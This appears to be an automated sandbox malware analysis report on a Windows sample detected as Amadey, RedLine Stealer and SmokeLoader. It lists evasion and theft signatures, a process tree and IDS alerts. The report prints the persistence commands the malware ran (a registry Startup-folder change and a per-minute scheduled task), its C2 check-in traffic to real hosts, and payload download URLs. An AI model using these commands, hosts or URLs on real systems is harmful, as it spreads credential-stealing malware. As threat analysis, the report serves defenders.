Play interactive tour

Edit tour

Windows Analysis Report xuTyOmef1g.exe

Overview

General Information

Sample Name:	xuTyOmef1g.exe
Analysis ID:	469615
MD5:	5c65af376bff0067a2109686755b36db
SHA1:	97fe279e6107f0b1b8a6b34073f21b85b71e9a38
SHA256:	9ecbf71bf0f2833437b61948eb635a404d5d835fadc13669ccc433bc6e9954c1
Tags:	Amadeyexe
Infos:
Most interesting Screenshot:

Detection

Amadey RedLine SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (window names)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

May check the online IP address of the machine

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Drops PE files with benign system names

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Hides threads from debuggers

.NET source code references suspicious native API functions

Changes security center settings (notifications, updates, antivirus, firewall)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

.NET source code contains method to dynamically call methods (often used by packers)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Uses reg.exe to modify the Windows registry

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Sigma detected: Direct Autorun Keys Modification

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Contains capabilities to detect virtual machines

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries disk information (often used to detect virtual machines)

Classification

Process Tree

System is w10x64

xuTyOmef1g.exe (PID: 1404 cmdline: 'C:\Users\user\Desktop\xuTyOmef1g.exe' MD5: 5C65AF376BFF0067A2109686755B36DB)

explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

4851.exe (PID: 6972 cmdline: C:\Users\user\AppData\Local\Temp\4851.exe MD5: B2D6C4C03D94DD7B4143BD7F553ACAF3)

conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

DB3B.exe (PID: 5536 cmdline: C:\Users\user\AppData\Local\Temp\DB3B.exe MD5: 505468E6735F6B0BF0D37A937EB2D155)

conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

F3D5.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\F3D5.exe MD5: 15EC7577EE3AE8FAAF21E42F168B3513)

rnyuf.exe (PID: 6176 cmdline: 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' MD5: 15EC7577EE3AE8FAAF21E42F168B3513)

cmd.exe (PID: 6308 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\ MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 6232 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\ MD5: CEE2A7E57DF2A159A065A34913A055C2)

schtasks.exe (PID: 6332 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Microsoft.exe (PID: 6196 cmdline: 'C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe' MD5: 0DEFE1E926B2407EE4A292480D8EBF48)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 4332 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4216 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3416 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1020 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2644 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2596 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 5316 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 1784 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 6928 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

uwtjrji (PID: 6600 cmdline: C:\Users\user\AppData\Roaming\uwtjrji MD5: 5C65AF376BFF0067A2109686755B36DB)

svchost.exe (PID: 6748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

rnyuf.exe (PID: 5224 cmdline: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe MD5: 15EC7577EE3AE8FAAF21E42F168B3513)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000021.00000002.513466845.00000000024C6000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000000.00000002.272458883.0000000002530000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
00000012.00000002.332203358.00000000024E0000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.272499037.0000000002551000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000012.00000002.336085099.00000000041A1000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001A.00000002.508968436.00000000013E2000.00000040.00020000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 4851.exe PID: 6972	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: DB3B.exe PID: 5536	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: rnyuf.exe PID: 6176	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
26.2.DB3B.exe.13e0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Sigma Overview

System Summary:

Sigma detected: Direct Autorun Keys Modification

Show sources

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\, CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6308, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\, ProcessId: 6232

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: xuTyOmef1g.exe

Virustotal: Detection: 37%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: http://193.142.59.123/forum/docs/sufile.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\uwtjrji

ReversingLabs: Detection: 41%

Machine Learning detection for sample

Show sources

Source: xuTyOmef1g.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\uwtjrji	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Microsoft[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Explorer[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Joe Sandbox ML: detected

Source: 40.0.Microsoft.exe.950000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: xuTyOmef1g.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49753 version: TLS 1.2

Source:	Binary string: C:\faloy38\vejaxutik\48_xemiwodiriwu\baludo27\jufopawev14\v.pdb source: 4851.exe, 00000016.00000000.337004048.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: C:\legoxep\jumubemum.pdb source: rnyuf.exe, 00000021.00000000.440628773.000000000041F000.00000002.00020000.sdmp, rnyuf.exe, 00000027.00000000.458945682.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: rnyuf.exe
Source:	Binary string: C:\judutenujutoj\gugabugeh18\ciduke vagaluyex\mayezo13\wani.pdb source: xuTyOmef1g.exe, 00000000.00000000.219452424.000000000041F000.00000002.00020000.sdmp, uwtjrji, 00000012.00000000.311457573.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: _.pdb source: 4851.exe, 00000016.00000002.442859715.00000000029B0000.00000004.00000001.sdmp
Source:	Binary string: 3C:\legoxep\jumubemum.pdb source: rnyuf.exe, 00000021.00000000.440628773.000000000041F000.00000002.00020000.sdmp, rnyuf.exe, 00000027.00000000.458945682.000000000041F000.00000002.00020000.sdmp
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Microsoft.exe, 00000028.00000002.507513112.00000000009D4000.00000040.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0041B0C2 FindFirstFileExW,	33_2_0041B0C2
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0288B312 FindFirstFileExW,	33_2_0288B312
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_0041B0C2 FindFirstFileExW,	39_2_0041B0C2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 185.215.113.206:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49755 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49758 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49763 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49808 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49811 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49812 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49814 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49815 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49818 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49822 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49823 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49824 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49825 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49827 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49829 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49831 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49832 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49834 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49836 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49837 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49838 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49839 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49841 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49842 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49844 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49845 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49846 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49847 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49849 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49851 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49853 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49854 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49856 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49857 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49858 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49866 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49868 -> 185.206.180.136:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49870 -> 185.206.180.136:80

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 25802
Source: unknown	Network traffic detected: HTTP traffic on port 25802 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 25802
Source: unknown	Network traffic detected: HTTP traffic on port 25802 -> 49820

May check the online IP address of the machine

Show sources

Source: unknown

DNS query: name: iplogger.org

Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.206Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: trustmanager.ugContent-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: GET /attachments/878382243242983437/879113244856430592/Microsoft.exe HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: 185.215.113.206Content-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
